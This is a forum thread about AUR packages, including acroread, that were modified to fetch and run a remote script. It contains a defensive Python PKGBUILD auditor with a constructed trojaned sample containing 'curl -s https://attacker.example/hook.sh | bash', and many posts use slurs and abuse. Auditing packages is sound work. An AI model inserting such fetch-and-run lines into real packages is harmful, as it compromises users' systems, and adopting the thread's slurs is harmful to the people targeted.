"Linux users of all distributions have received a major warning not to explicitly trust user-run software repositories following the latest incident related to Arch Linux. The project's user-maintained AUR packages (which stands for Arch User Repository) have been found to host malware code in several instances. Fortunately a code analysis was able to discover the modifications in due time - only several days after the dangerous code was placed in the app installation instructions. The security investigation shows that a malicious user with the nickname xeactor modified on June 7 an orphaned package (software without an active maintainer) called acroread. The changes included a curl script that downloads and runs a script from a remote site. This installs persistent software that reconfigures systemd in order to start periodically. While it appears that they are not a serious threat to the security of the infected hosts, the scripts can be manipulated at any time to include arbitrary code. Two other packages were modified in the same manner." Most Linux distributions have optional add-on repositories where community members can upload scripts or packages. These third-party items should be audited before being installed.
>Install Arch Linux! The AUR has everything you need!
>W-w-wait a minute don't use the AUR and it's not part of arch
Cameron Peterson
>Adobe Reader fucking neck yourself
Oliver Jackson
Nobody said that you must use AUR. I don't use it myself.
Sebastian Cooper
>explicitly states it's not curated and everything you do there is a matter of personal responsibility
>it's basically not different from using a random ass ppa
i don't even use arch but you're a fag. people are joking about AUR malware for years now, it's only the first actual proof for something everyone knew
Dylan Davis
You say that, but the AUR is the only thing that makes arch usable.
Benjamin Adams
t. brainlet
Angel Price
>just installed a few days ago
>just got settled in
>if you install this OS and then do something stupid you're explicitly advised against doing, bad things can happen
>this is the fault of the OS
Robert James
So Arch is compromised, Gentoo is compromised... What is /ourdistro/ now Jow Forums?
Xavier Murphy
Link to where you got that from?
Alexander Taylor
>Github mirror
>compromised
What did he mean by this?
Parker Murphy
Neither are compromised though.
But the answer is GuixSD.
Caleb Bennett
If you want to create malware for Arch, you can do this in 2 mins, just create a new package on the AUR. This is how the AUR works, stop baiting, retard.
Carter Parker
I just looked in pamac and turns out I've had it disabled. Just in time with this post as I was about to go back to ubuntu.
Dylan Richardson
>no hardware support
yeah no
Anthony Nguyen
it uses the same kernel as all the other distros you dumb fuck
Luke Russell
>mfw autistically read every ebuild from out of tree overlays before copying it into my own and never touching the original overlay again
if something is going to screw me over it is some chucklefuck adding an extra space in an rm -rf or a malicious commit to a popular project like ffmpeg
I bet this faggot came to Jow Forums because 'le based glow in dark nigger man xD'
Landon Williams
>>Install Arch Linux! The AUR has everything you need!
Said literally no one, ever. I've never once needed to look in the AUR for anything.
Ethan Nguyen
Having AUR enabled in pamac doesn't put you in danger. Installing compromised packages does.
Alexander Gomez
>malware
I thought this was yet another systemd thread.
Robert Taylor
OpenSUSE
Christian Wood
If you can't read code, the popular AUR packages are generally safe. It's the zero votes packages that you have to watch out for, and usually they are just a simple script or whatever. AUR is a great community tool and is what makes arch arch. If you get bot-netted you deserve it
Dylan Allen
Does anybody else besides programmers use Arch Linux unironically? No wonder why retards get malware.
Oliver Russell
ReactOS
Joseph Evans
install macOS, the one true linux distro
Jack Carter
>Adobe Reader
What 30 year old boomerware is that?
Daniel Wilson
It's not like the AUR doesn't advertise checking the PKGBUILD or install scripts before building a package. Everything is there to see.
Matthew Hall
Linux users of all distributions have received a major warning not to explicitly trust
>not to explicitly trust
Literally the English you'd expect from an Arch babby.
Connor Sanchez
Why do you keep making this retarded thread
Alexander Smith
>Fortunately a code analysis was able to discover the modifications in due time - only several days after the dangerous code was placed in the app installation instructions
Man, if you're gonna try to spread FUD bullshit, at least get your facts right. It was found within about 8 hours, not "several days". And the installed script was literally nonfunctional because the author was a retard. Literally harmless, and a fantastic warning not to blindly trust shit off the internet because next time it will be actually bad.
And on that note, where's your nonsense about random PPAs for Debian-based distros, Fedora's user repos, downloading random exes off the internet for Windows, etc etc? I think you might just be a retard, OP.
Eli Turner
>download random obscure code from public repository (AUR, GitHub, sourceforge, whatever)
>run it without checking what it's doing
>it's a virus
>how could it happen?
Honestly, I trust more in packages in AUR that have some ability to be curated via votes than in random ppa repositories like you need to in ubuntu or Debian that a guide told you to install
Samuel Edwards
Apple Macbook doesn't have this problem
Nathan Flores
Weird windows doesn't have this problem?
Carson Walker
have you been living under a rock for the past 30 years?
Adam Ortiz
No i just have windows 10 Enterprise with ATP
Adrian Powell
No, it uses Linux-Libre.
Adam Rivera
>install .exe from sketchy website, get virus
>complain on Jow Forums about Windows containing malware
>complain about the usefulness of Windows package management if random sketchy .exes could be viruses
This is how you faggots sound.
Pro tip for the genuinely curious: It takes 30 seconds to look at a PKGBUILD and see what URL it points to. If you don't trust the host, don't install the program. If reading a small text file to get an idea of what it says sounds like too much work for you, buy a Mac.
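The check described in the pro tip above (open the PKGBUILD, see which hosts it fetches from, and spot a download piped straight into a shell) can be scripted for the first pass. The following is an added example written for this thread; it is not code from the AUR, from Arch, or from any poster. The two PKGBUILDs, the host names (`vendor.example`, `attacker.example`) and the list of trusted hosts are all constructed for the demonstration, and the pipe-to-shell detection is a line-level heuristic, not a full bash parser.

```python
"""Quick PKGBUILD audit: list the hosts a package downloads from and flag
any line that pipes a download straight into a shell interpreter.
Added example; not code from the thread, the AUR or Arch. All host names
and both sample PKGBUILDs below are constructed."""
from __future__ import annotations
import re
import shlex
from urllib.parse import urlparse

DOWNLOADERS = {"curl", "wget"}                                        # fetch commands
INTERPRETERS = {"sh", "bash", "zsh", "dash", "python", "python3", "perl"}


def source_urls(pkgbuild: str) -> list[str]:
    """Extract URLs from source=() arrays, including source_x86_64=() variants
    and the 'localname::url' form. Variables such as $pkgver stay unexpanded."""
    urls = []
    for m in re.finditer(r"^source(?:_\w+)?=\((.*?)\)", pkgbuild, re.M | re.S):
        body = m.group(1)
        try:
            tokens = shlex.split(body)
        except ValueError:                  # unbalanced quotes: fall back to whitespace split
            tokens = body.split()
        for tok in tokens:
            tok = tok.split("::", 1)[-1]    # drop the optional local filename prefix
            if "://" in tok:
                urls.append(tok)
    return urls


def piped_downloads(pkgbuild: str) -> list[tuple[int, str]]:
    """Return (line number, line) for every line where curl/wget output is
    piped into an interpreter: the pattern the thread calls 'curl | bash'."""
    hits = []
    for lineno, raw in enumerate(pkgbuild.splitlines(), 1):
        code = re.sub(r"(?:^|\s)#.*$", "", raw)          # strip shell comments
        segments = code.split("|")
        for producer, consumer in zip(segments, segments[1:]):
            p, c = producer.split(), consumer.split()
            fetches = bool(p) and p[0].rsplit("/", 1)[-1] in DOWNLOADERS
            executes = any(t.rsplit("/", 1)[-1] in INTERPRETERS for t in c)
            if fetches and executes:
                hits.append((lineno, raw.strip()))
                break
    return hits


def audit_pkgbuild(pkgbuild: str, trusted_hosts) -> list[tuple[str, str]]:
    """Findings as (kind, detail). An empty list means nothing tripped these
    checks, which is not the same as 'safe': still read the whole file."""
    findings = []
    for url in source_urls(pkgbuild):
        u = urlparse(url)
        host = u.hostname or ""
        if not any(host == t or host.endswith("." + t) for t in trusted_hosts):
            findings.append(("untrusted-host", url))
        if u.scheme in ("http", "git+http", "ftp"):
            findings.append(("unencrypted-download", url))
    for lineno, line in piped_downloads(pkgbuild):
        findings.append(("pipe-to-shell", f"line {lineno}: {line}"))
    return findings


# Constructed sample: an ordinary PKGBUILD that builds from a tarball.
CLEAN_PKGBUILD = """\
# Maintainer: example (constructed sample, not a real AUR entry)
pkgname=hello-tool
pkgver=1.2.0
pkgrel=1
source=("$pkgname-$pkgver.tar.gz::https://github.com/example/hello-tool/archive/v$pkgver.tar.gz")
sha256sums=('SKIP')
build() {
  cd "$pkgname-$pkgver"
  make
}
package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
}
"""

# Constructed sample in the shape the quoted article describes: the vendor
# download is untouched, but package() now fetches and runs a remote script.
TROJANED_PKGBUILD = """\
# Maintainer: (orphaned) -- constructed sample, not the real package
pkgname=reader-bin
pkgver=9.5.5
pkgrel=2
source=("https://vendor.example/reader-$pkgver.tar.bz2")
sha256sums=('SKIP')
package() {
  tar -xjf "reader-$pkgver.tar.bz2" -C "$pkgdir"
  # injected line: fetches and runs code that is not part of the package
  curl -s https://attacker.example/hook.sh | bash
}
"""

if __name__ == "__main__":
    for name, text in (("clean", CLEAN_PKGBUILD), ("trojaned", TROJANED_PKGBUILD)):
        print(name, audit_pkgbuild(text, {"github.com", "vendor.example"}))
```

The trusted-host list is deliberately yours to supply: the point of the pro tip is that you decide whether the host a PKGBUILD points at is one you would download from by hand. The pipe check only catches the crude form; a line that downloads to a file and runs it in a later command, or an `.install` hook, still has to be read.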
Joshua Wood
If this is just now notable news then I'd say that means the AUR is in a good state
>>it's basically not different from using a random ass ppa
it sure as hell IS different than a random ppa which is a binary which you have to jump through hoops to even maybe be able to examine pkgbuilds are just scripts which you can and should easily read
Chase Morris
templeos
Liam Ward
also doesn't have internet
Nicholas Rivera
>users of all distributions have received a major warning not to explicitly trust
>DISCLAIMER: AUR packages are user produced content. Any use of the provided files is at your own risk. aur.archlinux.org/
Nah, that's not the interesting part. I've had the following experience:
>Arch repos are shit and have no software (rstudio, Firefox ESR and so on)
>AUR has everything! We don't need it in the repos.
>Dont use AUR, it's unofficial!
>Firefox ESR
>aur
and you're wrong my observation is that there is almost nothing in the aur that is used by the majority of users besides shit like discord and skype which should stay there
not esr but you shouldn't be using the aur for it anyway
Charles Gutierrez
>and you're wrong
You sure?
>Should stay there
You can reread my previous post again, user. And you should try reading the post before you get triggered.
sorry no images but you could paste that if it's text and ye im sure it's dumb to grab ff esr from the aur if you need something else that's there, i don't see an issue unless the script is broken and you can't fix it yourself but my observation is correct, the majority of users use almost nothing from the aur
Christopher Johnson
This just makes me glad I moved away from Arch in favor of Opensuse. What are the odds the open build service would have packages with spooky surprises baked in?
Jace Lewis
>sorry no images but you could paste that if it's text
It's a screenshot that shows there is no Firefox ESR in the repos.
>the majority of users use almost nothing from the aur
If that's the reasoning, they can remove everything that is not Base-System/DE/Office/Chrome from the main repos, as that's what the majority is using.
Brayden Edwards
>no Firefox ESR in the repos.
didn't say there was plenty of things in the repos ppl use there are some things in the aur which would be better to be in the repos but those are few my observation stands
Gavin Cruz
>didn't say there was
You literally said it here:
>My observation
1. Is unfounded 2. Doesn't bring anything new to the table You are basically saying "Doesn't matter", so it only reiterates my Greentext in the original post.
>You literally said it here: (You)# doesnt say there is esr in rep implies it's dumb to use aur for ff oh my observation is very founded in the years of usage and chatter with people if the table is your post then it accomplishes it's goal to shit all over it the ppl who do use aur a lot are those who use manjaro
Leo Sanchez
You might want to rewrite your post, I think your autocorrect is faulty and I don't quite understand most of it.
>Using aur is stupid
If you propose to compile from source manually, then what's the point of AUR at all? In the end this leaves us with a very shitty vanilla repos.
Daniel Clark
what's stopping you from getting a stock kernel from kernel.org you dip?
Liam Russell
Debian GNU/Linux
why do you need anything more? Afraid to do things yourself?
Leo Flores
>>Using aur is stupid
come on mang i didn't write that
>you propose to compile from source manually
where?
Xavier Rivera
>not reading pkgbuilds
Curl | bash is the most obvious malicious code, it wasn't even obfuscated in the slightest. Only idiots would've gotten hit with this
Aaron Young
the point of the aur is to host/share things missing from the repo or things no repo maintainer wants to maintain the danger is ppl like op don't read what they're about to run and then make a big deal about it the inconvenience is that a pkg script may require something tricky because one of its dependencies is obsolete [the dependency] (because the pkg is aimed at deb/untu) or something
Anthony Gomez
This. But anyways, only a retard would install Adobe Reader in the first place.
It's literally the default behavior for installing windows software without a way to easily update third party software.
Bentley Rodriguez
1 click installers.
Isaiah White
If someone puts malware in an Opensuse repo there isn't any way of knowing. In arch you can just look at the build file and make sure it's downloading code from the proper place. This is blown out of proportion. If you want to use Opensuse use Gecko instead so you'll have media codecs out of the box.
Ian Myers
>The changes included a curl script that downloads and runs a script from a remote site.
How """advanced""" The snapd miner was better and even then, it shows how hopeless the attackers are against the OS itself.